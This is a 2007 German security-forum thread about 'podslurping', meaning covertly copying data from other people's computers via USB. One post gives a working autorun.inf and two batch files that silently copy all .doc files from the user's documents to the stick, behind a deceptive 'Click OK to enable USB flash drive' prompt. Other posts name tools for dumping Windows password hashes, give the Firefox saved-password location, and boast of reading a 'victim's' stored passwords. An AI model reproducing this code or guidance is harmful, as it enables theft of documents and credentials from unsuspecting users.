Firefox gespeicherte pw's auslesen/decoden?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von coach, 4. November 2007 .

Schlagworte:
  1. 4. November 2007
    tjoar, wollte fragen, wo wichtige passwörter gespeichert sind/wie ich sie finde, um das ganze ma zu testen...mfg coach

    PS: am besten mit passender batch-datei oder befehlen dafür, bin was .bat's angeht nen noob^^
     
    + Multi-Zitat Zitieren
  3. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    Hey,

    also wenn du grade damit anfängst dann würde ich erstmal probieren einfach nur irgendeine Datei rüberkopiert zu bekommen. Ich hab das selber zwar noch nie gemacht aber ich würde sagen, dass du dich später sowieso auf irgendwelche Software spezialisieren musst.
    An die SAM von Windows ( wenn du es unter win testen willst) kommst du ja während das System läuft eh nicht drann also könntest du es ja dann als zweiten Schritt mit irgendwelchen Instant messangern versuchen.

    und zum thema bat:
    http://www.libe.net/themen/BATch-Befehle.php

    greez myth
     
    + Multi-Zitat Zitieren
  4. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    also, die grunddinge mitm kopiern und so bekomm ich hin, aber was will ich mit sachen wie mails?=P ich würd lieber die gespeicherten pw's von firefox oder so auslesen. gibts keinen weg, auf diese art SAM auszulesen? wie sollte man sonst drankommen? andre proggs schaffen das doch bestimmt auch, wie machen die das denn?...mfg coach
     
    + Multi-Zitat Zitieren
  5. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    also meiner meinung nach gibt es keine programm die während des betriebs die sam auslesen können. du kannst halt einfach ne livecd ins laufwerk schieben und so drauf zugreifen das is einfach.
    es gab nur mal ne sicherheitslücke in einem dienst *überleg* ich glaub der heißt Netzwerk-DDE-Serverdienst. Aber die sicherheitslücke wurde von den Microsofties gefixt.

    Und ich hab zu firefox mal schnell gegooglet und bin hier drauf gestoßen:
    http://de.susewiki.org/index.php?title=Firefox_-_wo_sind_die_Lesezeichen%2C_Passw%C3%B6rter%2C_Cookies_usw._gespeichert%3F
    das sollte wohl sein was du brauchst

    wie man die passwörter dann aber entschlüsselt weiß ich auch nicht

    greez myth

    //edit: aber poste doch mal wie man windows oder linux dazu bekommt code auf einem usb-stick auszuführen nur dadurch das man ihn einsteckt. das würde mich auch mal interessieren XD
     
    + Multi-Zitat Zitieren
  6. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    soweit ich weiß kann der l0phtcrack online die sam auslesen

    wenn du sie nur kopieren willst.. google mal nach ich glaub das din heißt sam-copy oder so.. das war aber alles aus w2k zeiten .. K/A ob das no geht
     
    + Multi-Zitat Zitieren
  7. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    Die Win Sams kann jedes drittklassige "hackertool" während
    des Betriebs auslesen solange der Account darauf Zugriff hat. / bzw lese rechte.

    z.B.
    PWDump2
    PWDump1
    Cain & Abel
     
    + Multi-Zitat Zitieren
  8. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    naja, wies geht is ansich simpel: ne autorun.inf aufn usb-stick packen und ne batch oder exe von der ausführen lassen, beispiel wäre:
    Code:
    [autorun]
icon=lilguy.ico
open=start.bat
action=Click “OK” to enable USB flash drive
shell\open\command=start.bat

in der autorun.inf


@echo off

@start /min slurp.bat /B

@exit 

in die start.bat


@echo off
mkdir %~d0\%computername%
xcopy “C:\Documents and Settings\%username%\My Documents\*.doc” %~d0\%computername% /s/c/q/r/h
@cls
@exit

in die slurp.bat
    das kopiert alle .doc dateien aus den eigenen dateien in einen unterordner aufm stick, der den namen des pc's trägt...mfg coach

    PS: das ganze kann man beliebig erweitern, die passenden kenntnisse vorrausgesetzt^^

    PPS: is bei .bat's nur doof miter konsole, also ne kleine exe schreiben, die im hintergrund läuft und gut is^^

    PPPS: wems gefällt, bin für bewertungen immer zu haben^^

    EDIT: @myth, thx für den link, die daten sind bei windoof, falls es wen intressiert, unter %username%\Anwendungsdaten\Mozilla\Firefox\Profiles\*.default\ wär echt ma intressant, wie man die passwörter mit der key-datei entschlüsseln kann...
     
    + Multi-Zitat Zitieren
  9. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    naja ich denke dass genau diese programme nicht mehr funktionieren wegen dem abgeschaltetem dienst. ich werds dierekt mal ausprobieren und das ergebnis editieren aber ich bin skeptisch

    @coach: lol das mit der autorun hätte mir auch einfallen können XD. nein ich dachte jetzt es wird eine lücke im treiber für usb-wechsellaufwerke ausgenutzt oder ähnliches. aber da denke ich wohl zu kompliziert
    is halt schade dass das warschienlich bei den meisten pcs nicht geht sofern die anwender sicherheitsbewusst sind und die funktion abgeschaltet haben.

    greez myth

    //edit: ok ich geb mich geschlagen: http://swamp.foofus.net/fizzgig/fgdump/ mit dem programm geht es einwandfrei. dann kannst du deine bat ja jetzt anpassen coach XD
     
    + Multi-Zitat Zitieren
  10. 4. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    ok, jetz nurnoch die frage mit firefox und den gespeicherten pw's und gut is^^ kann hier iwer c? dann könnte man die source von iceweasel anschaun und da ma nach suchen...mfg coach

    @Myth: warum einfach, wenns auch kompliziert geht xD naja, und zum thema sicherheitsbewusst: ich kenne soooviele, die autorun nich deaktiviert haben^^
     
    + Multi-Zitat Zitieren
  11. 5. November 2007
    AW: Firefox gespeicherte pw's auslesen/decoden?

    Moin Moin,

    Update: Gespeicherte Passwörter: Sie sind mit Freeware auszulesen
    Um passwortgeschützte Dateien in der damit verknüpften Anwendung öffnen zu können, müssen Sie entweder das betreffende Passwort kennen oder es aus der Datei entfernen. Hacker haben besonders leichtes Spiel bei unzureichenden Kennwörtern, denn hier führt schlichtes Raten am schnellsten ans Ziel    .

    Quelle : - Gratis-Tools für Windows-Sicherheit

    MFG

    R@ts da Pansenvvvvvv
     
    + Multi-Zitat Zitieren
  12. 5. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    du könntest die passwörter auch einfach anzeigen lassen in firefox.

    Außer dein "Opfer" hat ein Master Passwort festgelegt, aber nicht einmal das benutzen die meisten. bin so schon oft an das gekommen was ich wollte

    In firefox Extras -> Einstellungen -> Sicherheit -> Passwörter anzeigen

    Also warum schwierig wenns auch ganz einfach geht
     
    + Multi-Zitat Zitieren
  13. 5. November 2007
    AW: PodSlurping? Wo sind die intressanten daten?

    weils hier um den lerneffekt geht und firefox-bedienung nix mit podslurping zutun hat^^...mfg coach
     
    + Multi-Zitat Zitieren
  14. 5. November 2007
    AW: Firefox gespeicherte pw's auslesen/decoden?

    meiner erinnerung nach gibt es auch addons extra für den firefox, mit denen man solche passwörter sichtbar machen kann. so web developer addons, schau mal

    have fun
     
    + Multi-Zitat Zitieren
  15. 5. November 2007
    AW: Firefox gespeicherte pw's auslesen/decoden?

    ich glaub auch du hast das prinzip noch nicht ganz verstanden.
    es geht daurm von einem pc , auf den man dierekt keinen zugriff hat daten runterzukopieren.
    einfachste situation ist das anmeldefenster unter win. wenn du das pw nicht hast kann man nunmal keine firefox addons installieren

    greez myth
     
    + Multi-Zitat Zitieren
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten